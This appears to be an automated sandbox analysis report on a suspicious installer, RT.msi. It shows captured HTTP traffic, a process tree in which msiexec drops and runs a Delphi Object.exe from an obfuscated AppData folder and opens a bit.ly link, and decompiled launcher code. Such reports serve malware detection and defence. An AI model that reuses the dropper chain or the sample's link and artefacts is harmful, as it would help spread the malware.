                                                                                              2021-12-13 23:57:32 UTC8372INData Raw: 66 66 66 2c 2d 32 70 78 20 30 20 30 20 23 66 66 66 7d 2e 67 62 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 67 72 69 64 20 2e 69 73 2d 6c 69 73 74 20 61 72 74 69 63 6c 65 3a 6e 6f 74 28 3a 6c 61 73 74 2d 63 68 69 6c 64 29 7b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 32 70 78 7d 2e 67 62 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 67 72 69 64 20 2e 67 62 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 67 72 69 64 2d 69 6d 61 67 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 67 62 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 67 72 69 64 20 2e 67 62 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 67 72 69 64 2d 6d 6f 72 65 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 32 32 32 7d 2e 62 75 74 74 6f 6e 2d 6d 6f 72 65 2d 6c 69 6e 6b 20 2e 67 62 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 67 72 69 64 2d 6d 6f 72
                                                                                              Data Ascii: fff,-2px 0 0 #fff}.gb-block-post-grid .is-list article:not(:last-child){border-width:2px}.gb-block-post-grid .gb-block-post-grid-image{position:relative}.gb-block-post-grid .gb-block-post-grid-more-link{color:#222}.button-more-link .gb-block-post-grid-mor
                                                                                              2021-12-13 23:57:32 UTC8373INData Raw: 69 61 6c 2d 6c 69 6e 6b 73 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 2e 69 73 2d 73 74 79 6c 65 2d 73 74 72 69 70 65 73 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 77 69 64 74 68 3a 30 7d 2e 66 75 6c 6c 2d 77 69 64 74 68 2d 63 6f 6e 74 65 6e 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 2e 61 6c 69 67 6e 66 75 6c 6c 7b 6d 61 72 67 69 6e 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 36 30 70 78 29 7b 2e 66 75 6c 6c 2d 77 69 64 74 68 2d 63 6f 6e 74 65 6e 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 2e 61 6c
                                                                                              Data Ascii: ial-links{padding-left:0}.wp-block-table.is-style-stripes{border-bottom-width:0}.full-width-content .entry-content>.wp-block-table.alignfull{margin:0;width:100%}@media only screen and (min-width:960px){.full-width-content .entry-content>.wp-block-table.al
                                                                                              2021-12-13 23:57:32 UTC8374INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              9192.168.2.349765104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8364OUTGET /css/websetnet.net/wp-content/plugins/wordpress-popular-posts/assets/css/wpp.css HTTP/1.1
                                                                                              Accept: text/css, */*
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8374INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: text/css
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a5a84e4a73-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176186
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"60e7374167560142cf292eb8b988b0482819de3df719d7ddd9d152d45f6c460c"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-Cache: MISS, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-lga21962-LGA, cache-fra19125-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8375INData Raw: 31 38 34 0d 0a 2e 77 70 70 2d 6e 6f 2d 64 61 74 61 7b 7d 2e 77 70 70 2d 6c 69 73 74 7b 7d 2e 77 70 70 2d 6c 69 73 74 20 6c 69 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 77 70 70 2d 6c 69 73 74 20 6c 69 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 77 70 70 2d 6c 69 73 74 20 6c 69 2e 63 75 72 72 65 6e 74 7b 7d 2e 77 70 70 2d 74 68 75 6d 62 6e 61 69 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 3a 30 20 31 72 65 6d 20 30 20 30 3b 62 6f 72 64 65 72 3a 30 7d 2e 77 70 70 2d 70 6f 73 74 2d 74 69 74 6c 65 7b 7d 2e 77 70 70 2d 65
                                                                                              Data Ascii: 184.wpp-no-data{}.wpp-list{}.wpp-list li{overflow:hidden;float:none;clear:both;margin-bottom:1rem}.wpp-list li:last-of-type{margin-bottom:0}.wpp-list li.current{}.wpp-thumbnail{display:inline;float:left;margin:0 1rem 0 0;border:0}.wpp-post-title{}.wpp-e
                                                                                              2021-12-13 23:57:32 UTC8375INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Code Manipulations

                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Start time:00:57:02
                                                                                              Start date:14/12/2021
                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\RT.msi"
                                                                                              Imagebase:0x7ff667680000
                                                                                              File size:66048 bytes
                                                                                              MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:00:57:03
                                                                                              Start date:14/12/2021
                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                              Imagebase:0x7ff667680000
                                                                                              File size:66048 bytes
                                                                                              MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:00:57:05
                                                                                              Start date:14/12/2021
                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding DFDBA65093139CBFCFC106788AB0DE76
                                                                                              Imagebase:0x980000
                                                                                              File size:59904 bytes
                                                                                              MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:00:57:23
                                                                                              Start date:14/12/2021
                                                                                              Path:C:\Windows\Installer\MSIBA90.tmp
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Installer\MSIBA90.tmp" /DontWait "C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe
                                                                                              Imagebase:0xf70000
                                                                                              File size:413856 bytes
                                                                                              MD5 hash:A34D4F165087B11D9E06781D52262868
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:00:57:24
                                                                                              Start date:14/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:1284592 bytes
                                                                                              MD5 hash:06B1B36CD7C59CF46CD7F5D661C4DA6F
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:Borland Delphi
                                                                                              Antivirus matches:
                                                                                              • Detection: 3%, Metadefender, Browse
                                                                                              • Detection: 0%, ReversingLabs
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:00:57:28
                                                                                              Start date:14/12/2021
                                                                                              Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Program Files\Internet Explorer\iexplore.exe" %1 "https://bit.ly/3DvoVCc
                                                                                              Imagebase:0x7ff7c16c0000
                                                                                              File size:823560 bytes
                                                                                              MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:00:57:29
                                                                                              Start date:14/12/2021
                                                                                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:640 CREDAT:9474 /prefetch:2
                                                                                              Imagebase:0xb80000
                                                                                              File size:822536 bytes
                                                                                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:00:57:41
                                                                                              Start date:14/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:1284592 bytes
                                                                                              MD5 hash:06B1B36CD7C59CF46CD7F5D661C4DA6F
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:Borland Delphi
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:00:57:49
                                                                                              Start date:14/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:1284592 bytes
                                                                                              MD5 hash:06B1B36CD7C59CF46CD7F5D661C4DA6F
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:Borland Delphi
                                                                                              Reputation:low

                                                                                              Disassembly

                                                                                              Code Analysis

                                                                                              Reset < >

                                                                                                Executed Functions

                                                                                                C-Code - Quality: 27%
                                                                                                			E00F74B10(void* __ebx, signed int* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void** _a4, signed int _a8, char _a12) {
                                                                                                				long _v8;
                                                                                                				char _v16;
                                                                                                				signed int _v20;
                                                                                                				int _v24;
                                                                                                				int _v28;
                                                                                                				char _v44;
                                                                                                				int _v48;
                                                                                                				int _v52;
                                                                                                				char _v68;
                                                                                                				int _v72;
                                                                                                				int _v76;
                                                                                                				char _v92;
                                                                                                				char _v93;
                                                                                                				void* _v100;
                                                                                                				char _v101;
                                                                                                				void** _v108;
                                                                                                				signed int _v112;
                                                                                                				int _v116;
                                                                                                				int _v120;
                                                                                                				int _v124;
                                                                                                				int _v128;
                                                                                                				int _v132;
                                                                                                				int _v136;
                                                                                                				int _v140;
                                                                                                				void* _v144;
                                                                                                				signed int* _v148;
                                                                                                				int _v152;
                                                                                                				int _v156;
                                                                                                				int _v160;
                                                                                                				int _v164;
                                                                                                				void* _v168;
                                                                                                				int _v172;
                                                                                                				int _v176;
                                                                                                				intOrPtr _v180;
                                                                                                				signed int _v188;
                                                                                                				char _v196;
                                                                                                				void* _v204;
                                                                                                				char _v212;
                                                                                                				void* _v220;
                                                                                                				char _v228;
                                                                                                				char _v244;
                                                                                                				char _v260;
                                                                                                				long _v416;
                                                                                                				char _v424;
                                                                                                				signed int _v428;
                                                                                                				void* __ebp;
                                                                                                				signed int _t221;
                                                                                                				signed int _t222;
                                                                                                				void* _t227;
                                                                                                				void* _t231;
                                                                                                				char* _t232;
                                                                                                				intOrPtr* _t234;
                                                                                                				void* _t235;
                                                                                                				void* _t236;
                                                                                                				intOrPtr* _t237;
                                                                                                				void* _t238;
                                                                                                				intOrPtr* _t239;
                                                                                                				void* _t240;
                                                                                                				intOrPtr* _t241;
                                                                                                				void* _t242;
                                                                                                				intOrPtr* _t243;
                                                                                                				void* _t244;
                                                                                                				intOrPtr* _t245;
                                                                                                				void* _t246;
                                                                                                				intOrPtr* _t247;
                                                                                                				signed int _t254;
                                                                                                				char* _t256;
                                                                                                				void* _t258;
                                                                                                				void* _t260;
                                                                                                				intOrPtr* _t264;
                                                                                                				void* _t265;
                                                                                                				void* _t274;
                                                                                                				void* _t275;
                                                                                                				void* _t276;
                                                                                                				void* _t277;
                                                                                                				void* _t278;
                                                                                                				void* _t279;
                                                                                                				void* _t280;
                                                                                                				intOrPtr* _t282;
                                                                                                				void* _t296;
                                                                                                				void* _t299;
                                                                                                				int _t303;
                                                                                                				void* _t316;
                                                                                                				void* _t318;
                                                                                                				long* _t320;
                                                                                                				int _t322;
                                                                                                				void* _t323;
                                                                                                				signed int _t345;
                                                                                                				void* _t346;
                                                                                                				intOrPtr _t351;
                                                                                                				signed int _t364;
                                                                                                				long* _t373;
                                                                                                				void* _t374;
                                                                                                				signed int _t385;
                                                                                                				intOrPtr* _t387;
                                                                                                				signed int _t388;
                                                                                                				signed int _t389;
                                                                                                				signed int _t390;
                                                                                                				void* _t392;
                                                                                                				void* _t394;
                                                                                                				signed int _t395;
                                                                                                				void* _t397;
                                                                                                				signed int _t398;
                                                                                                				void* _t403;
                                                                                                				int _t404;
                                                                                                
                                                                                                				_t380 = __edx;
                                                                                                				_t331 = __ebx;
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb5bd9);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t398 = _t397 - 0xf4;
                                                                                                				_t221 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_t222 = _t221 ^ _t395;
                                                                                                				_v20 = _t222;
                                                                                                				_push(__esi);
                                                                                                				_push(__edi);
                                                                                                				_push(_t222);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_t392 = __edx;
                                                                                                				_v100 = __edx;
                                                                                                				_v148 = __ecx;
                                                                                                				_t385 = 0;
                                                                                                				_v108 = _a4;
                                                                                                				_v112 = 0;
                                                                                                				if(E00F76110(__ebx, 0, __eflags) == 0) {
                                                                                                					L73:
                                                                                                					_t380 = _t392;
                                                                                                					_t227 = _a8 & 0x000000ff ^ 0x00000001;
                                                                                                					__eflags = _t227;
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(_t227);
                                                                                                					_push(_v108);
                                                                                                					E00F75360(_v148, _t392, _t385, _t392);
                                                                                                					goto L74;
                                                                                                				} else {
                                                                                                					_t231 = E00F75810();
                                                                                                					if(_t231 == 0) {
                                                                                                						goto L73;
                                                                                                					} else {
                                                                                                						__imp__CoInitialize(0); // executed
                                                                                                						_v101 = _t231 == 0;
                                                                                                						_v8 = 0;
                                                                                                						_v144 = 0;
                                                                                                						_v8 = 2;
                                                                                                						_t232 =  &_v144;
                                                                                                						__imp__CoCreateInstance(0xfb8280, 0, 4, 0xfc6fd8, _t232); // executed
                                                                                                						if(_t232 >= 0) {
                                                                                                							_v164 = 0;
                                                                                                							__imp__#8( &_v244);
                                                                                                							_v8 = 4;
                                                                                                							_v140 = 0;
                                                                                                							_v8 = 6;
                                                                                                							_t234 = _v144;
                                                                                                							_t380 =  &_v244;
                                                                                                							_t235 =  *((intOrPtr*)( *_t234 + 0x3c))(_t234, _t380, _t380, 8,  &_v164, 1,  &_v140);
                                                                                                							__eflags = _t235;
                                                                                                							if(_t235 >= 0) {
                                                                                                								_v136 = 0;
                                                                                                								_v8 = 0xa;
                                                                                                								_t236 =  &_v136;
                                                                                                								__imp__#176(_v140, 0xfb8270, 0xfc6fc8, _t236); // executed
                                                                                                								__eflags = _t236;
                                                                                                								if(_t236 >= 0) {
                                                                                                									_v132 = 0;
                                                                                                									_v8 = 0xf;
                                                                                                									_t380 =  &_v132;
                                                                                                									_t237 = _v136;
                                                                                                									_t238 =  *((intOrPtr*)( *_t237 + 0x3c))(_t237,  &_v132);
                                                                                                									__eflags = _t238;
                                                                                                									if(_t238 >= 0) {
                                                                                                										_v128 = 0;
                                                                                                										_v8 = 0x15;
                                                                                                										_t380 =  &_v128;
                                                                                                										_t239 = _v132;
                                                                                                										_t240 =  *((intOrPtr*)( *_t239 + 0x3c))(_t239, 0, 0xfc6fb8,  &_v128);
                                                                                                										__eflags = _t240;
                                                                                                										if(_t240 >= 0) {
                                                                                                											_v124 = 0;
                                                                                                											_v8 = 0x1c;
                                                                                                											_t380 =  &_v124;
                                                                                                											_t241 = _v128;
                                                                                                											_t242 =  *((intOrPtr*)( *_t241))(_t241, 0xfc6fa8,  &_v124); // executed
                                                                                                											__eflags = _t242;
                                                                                                											if(_t242 >= 0) {
                                                                                                												_v120 = 0;
                                                                                                												_v8 = 0x24;
                                                                                                												_t380 =  &_v120;
                                                                                                												_t243 = _v124;
                                                                                                												_t244 =  *((intOrPtr*)( *_t243 + 0x1c))(_t243,  &_v120);
                                                                                                												__eflags = _t244;
                                                                                                												if(_t244 >= 0) {
                                                                                                													_v116 = 0;
                                                                                                													_v8 = 0x2d;
                                                                                                													_t380 =  &_v116;
                                                                                                													_t245 = _v120;
                                                                                                													_t246 =  *((intOrPtr*)( *_t245))(_t245, 0xfc6f98,  &_v116); // executed
                                                                                                													__eflags = _t246;
                                                                                                													if(_t246 >= 0) {
                                                                                                														_t247 = __imp__#2;
                                                                                                														_t345 =  *_v148;
                                                                                                														__eflags = _t345;
                                                                                                														if(_t345 != 0) {
                                                                                                															_t394 =  *_t247(_t345);
                                                                                                															_v168 = _t394;
                                                                                                															__eflags = _t394;
                                                                                                															if(_t394 == 0) {
                                                                                                																_push(0x8007000e);
                                                                                                																E00F71CB0();
                                                                                                																goto L76;
                                                                                                															} else {
                                                                                                																_t247 = __imp__#2;
                                                                                                																goto L22;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t394 = 0;
                                                                                                															_v168 = 0;
                                                                                                															L22:
                                                                                                															_v8 = 0x36;
                                                                                                															_t380 = 8;
                                                                                                															_v228 = 8;
                                                                                                															_t345 =  *_v100;
                                                                                                															_v100 = _t345;
                                                                                                															_t258 =  *_t247(_t345);
                                                                                                															_v220 = _t258;
                                                                                                															__eflags = _t258;
                                                                                                															if(_t258 != 0) {
                                                                                                																L24:
                                                                                                																_v8 = 0x37;
                                                                                                																_t345 = 8;
                                                                                                																_v212 = 8;
                                                                                                																_t260 =  *_v108;
                                                                                                																_v100 = _t260;
                                                                                                																__imp__#2(_t260);
                                                                                                																_v204 = _t260;
                                                                                                																__eflags = _t260;
                                                                                                																if(_t260 != 0) {
                                                                                                																	L26:
                                                                                                																	_v8 = 0x38;
                                                                                                																	__imp__#8( &_v260);
                                                                                                																	_v8 = 0x39;
                                                                                                																	_v196 = 3;
                                                                                                																	_v188 = _a8 & 0x000000ff ^ 0x00000001;
                                                                                                																	_v8 = 0x3a;
                                                                                                																	_t264 = _v116;
                                                                                                																	asm("movups xmm0, [ebp-0xc0]");
                                                                                                																	_t351 =  *_t264;
                                                                                                																	_t380 =  *(_t351 + 0x7c);
                                                                                                																	asm("movups [ecx], xmm0");
                                                                                                																	asm("movups xmm0, [ebp-0x100]");
                                                                                                																	asm("movups [ecx], xmm0");
                                                                                                																	_t403 = _t398 - 0xffffffffffffffe0;
                                                                                                																	asm("movups xmm0, [ebp-0xd0]");
                                                                                                																	asm("movups [ecx], xmm0");
                                                                                                																	asm("movups xmm0, [ebp-0xe0]");
                                                                                                																	asm("movups [ecx], xmm0");
                                                                                                																	_t265 =  *( *(_t351 + 0x7c))(_t264, _t394);
                                                                                                																	__eflags = _t265;
                                                                                                																	if(_t265 >= 0) {
                                                                                                																		__eflags = _a12;
                                                                                                																		if(_a12 == 0) {
                                                                                                																			L51:
                                                                                                																			_v93 = 1;
                                                                                                																			goto L52;
                                                                                                																		} else {
                                                                                                																			_v108 = 0;
                                                                                                																			asm("o16 nop [eax+eax]");
                                                                                                																			do {
                                                                                                																				_v28 = 0;
                                                                                                																				_v24 = 0;
                                                                                                																				_v28 = 0;
                                                                                                																				_t383 =  *_v148;
                                                                                                																				__eflags = 0;
                                                                                                																				_t364 =  *_v148;
                                                                                                																				_v44 = 0;
                                                                                                																				_v24 = 7;
                                                                                                																				_v100 = _t364 + 2;
                                                                                                																				do {
                                                                                                																					_t296 =  *_t364;
                                                                                                																					_t364 = _t364 + 2;
                                                                                                																					__eflags = _t296;
                                                                                                																				} while (_t296 != 0);
                                                                                                																				E00F71D10(_t331,  &_v44, _t385, _t394, _t383, _t364 - _v100 >> 1);
                                                                                                																				_v8 = 0x44;
                                                                                                																				_t398 = _t403 - 8;
                                                                                                																				_v76 = 0;
                                                                                                																				_v72 = 0;
                                                                                                																				_t345 =  &_v44;
                                                                                                																				_t385 = _t385 | 0x00000001;
                                                                                                																				_v76 = 0;
                                                                                                																				_v72 = 7;
                                                                                                																				_v92 = 0;
                                                                                                																				_v112 = _t385;
                                                                                                																				_t299 = E00F71240(_t331, _t345, _t385, _t394);
                                                                                                																				__eflags = _t299 - 0xffffffff;
                                                                                                																				if(_t299 == 0xffffffff) {
                                                                                                																					__eflags = _v24 - 8;
                                                                                                																					_t301 =  >=  ? _v44 :  &_v44;
                                                                                                																					E00F71D10(_t331,  &_v92, _t385, _t394,  >=  ? _v44 :  &_v44, _v28);
                                                                                                																					goto L36;
                                                                                                																				} else {
                                                                                                																					_t103 = _t299 + 1; // 0x1
                                                                                                																					_t380 = _t103;
                                                                                                																					_v8 = 0x45;
                                                                                                																					_v68 = 0;
                                                                                                																					_t322 = _v28;
                                                                                                																					_v52 = 0;
                                                                                                																					_v48 = 0;
                                                                                                																					_v52 = 0;
                                                                                                																					_v48 = 7;
                                                                                                																					__eflags = _t322 - _t380;
                                                                                                																					if(_t322 < _t380) {
                                                                                                																						goto L77;
                                                                                                																					} else {
                                                                                                																						_t323 = _t322 - _t380;
                                                                                                																						__eflags = _t323 - 0xffffffff;
                                                                                                																						_t376 =  <  ? _t323 : _t345 | 0xffffffff;
                                                                                                																						__eflags = _v24 - 8;
                                                                                                																						_t325 =  >=  ? _v44 :  &_v44;
                                                                                                																						E00F71D10(_t331,  &_v68, _t385, _t394, ( >=  ? _v44 :  &_v44) + _t380 * 2,  <  ? _t323 : _t345 | 0xffffffff);
                                                                                                																						_t390 = _t385 | 0x00000002;
                                                                                                																						_v112 = _t390;
                                                                                                																						E00F72D10( &_v92);
                                                                                                																						asm("movups xmm0, [ebp-0x40]");
                                                                                                																						_t385 = _t390 & 0xfffffffd;
                                                                                                																						_v68 = 0;
                                                                                                																						asm("movups [ebp-0x58], xmm0");
                                                                                                																						asm("movq xmm0, [ebp-0x30]");
                                                                                                																						asm("movq [ebp-0x48], xmm0");
                                                                                                																						_v52 = 0;
                                                                                                																						_v48 = 7;
                                                                                                																						_v112 = _t385;
                                                                                                																						_v8 = 0x44;
                                                                                                																						E00F72D10( &_v68);
                                                                                                																						L36:
                                                                                                																						_v8 = 0x46;
                                                                                                																						_t404 = _t398 - 0x28;
                                                                                                																						_t303 = _t404;
                                                                                                																						_v100 = _t404;
                                                                                                																						_v172 = _t303;
                                                                                                																						 *(_t303 + 0x24) = 0;
                                                                                                																						_v8 = 0x47;
                                                                                                																						 *_t303 = 0xfc6f74;
                                                                                                																						 *((intOrPtr*)(_t303 + 4)) =  &_v92;
                                                                                                																						 *(_t303 + 0x24) = _t303;
                                                                                                																						_v8 = 0x48;
                                                                                                																						_v8 = 0x46;
                                                                                                																						E00F737A0(_t331,  &_v160, _t385);
                                                                                                																						_t388 = _t385 | 0x00000004;
                                                                                                																						_t403 = _t404 + 0x28;
                                                                                                																						_v112 = _t388;
                                                                                                																						_t389 = _t388 & 0xfffffffe;
                                                                                                																						_v112 = _t389;
                                                                                                																						_v8 = 0x49;
                                                                                                																						E00F72D10( &_v92);
                                                                                                																						_v8 = 0x4a;
                                                                                                																						E00F72D10( &_v44);
                                                                                                																						_t373 = _v160;
                                                                                                																						_t380 = _v156;
                                                                                                																						__eflags = _t373 - _t380;
                                                                                                																						if(_t373 != _t380) {
                                                                                                																							_v108 = 0x258;
                                                                                                																						} else {
                                                                                                																							_v108 =  &(_v108[0]);
                                                                                                																						}
                                                                                                																						__eflags = _t373 - _t380;
                                                                                                																						if(_t373 != _t380) {
                                                                                                																							__eflags = (_t380 - _t373 & 0xfffffffc) - 4;
                                                                                                																							if((_t380 - _t373 & 0xfffffffc) != 4) {
                                                                                                																								_push(_v172);
                                                                                                																								_t320 = E00F74700(_t373, _t380);
                                                                                                																								_t403 = _t403 + 4;
                                                                                                																								_t373 = _t320;
                                                                                                																							}
                                                                                                																							_t316 = OpenProcess(0x100400, 0,  *_t373);
                                                                                                																							_v100 = _t316;
                                                                                                																							_v180 = 0xfc6b50;
                                                                                                																							_v176 = _t316;
                                                                                                																							_v8 = 0x4b;
                                                                                                																							WaitForSingleObject(_t316, 0xffffffff);
                                                                                                																							_v8 = 0x4a;
                                                                                                																							_t318 = _v100;
                                                                                                																							_v180 = 0xfc6b50;
                                                                                                																							__eflags = _t318;
                                                                                                																							if(_t318 != 0) {
                                                                                                																								CloseHandle(_t318);
                                                                                                																								_v176 = 0;
                                                                                                																							}
                                                                                                																						}
                                                                                                																						_t385 = _t389 & 0xfffffffb;
                                                                                                																						_v112 = _t385;
                                                                                                																						_v8 = 0x3a;
                                                                                                																						_t374 = _v160;
                                                                                                																						__eflags = _t374;
                                                                                                																						if(_t374 == 0) {
                                                                                                																							goto L50;
                                                                                                																						} else {
                                                                                                																							_t380 = _t374;
                                                                                                																							__eflags = (_v152 - _t374 & 0xfffffffc) - 0x1000;
                                                                                                																							if((_v152 - _t374 & 0xfffffffc) < 0x1000) {
                                                                                                																								L47:
                                                                                                																								__eflags = _t374;
                                                                                                																								if(_t374 != 0) {
                                                                                                																									LocalFree(_t374);
                                                                                                																								}
                                                                                                																								_v160 = 0;
                                                                                                																								_v156 = 0;
                                                                                                																								_v152 = 0;
                                                                                                																								goto L50;
                                                                                                																							} else {
                                                                                                																								_t345 =  *(_t374 - 4);
                                                                                                																								__eflags = _t380 - 4 - 0x1f;
                                                                                                																								if(__eflags > 0) {
                                                                                                																									goto L78;
                                                                                                																								} else {
                                                                                                																									goto L47;
                                                                                                																								}
                                                                                                																							}
                                                                                                																						}
                                                                                                																					}
                                                                                                																				}
                                                                                                																				goto L81;
                                                                                                																				L50:
                                                                                                																				__eflags = _v108 - 0x258;
                                                                                                																			} while (_v108 < 0x258);
                                                                                                																			goto L51;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_v93 = 0;
                                                                                                																		L52:
                                                                                                																		_v8 = 0x39;
                                                                                                																		_t387 = __imp__#9;
                                                                                                																		 *_t387( &_v196);
                                                                                                																		_v8 = 0x38;
                                                                                                																		 *_t387( &_v260);
                                                                                                																		_v8 = 0x37;
                                                                                                																		 *_t387( &_v212);
                                                                                                																		_v8 = 0x36;
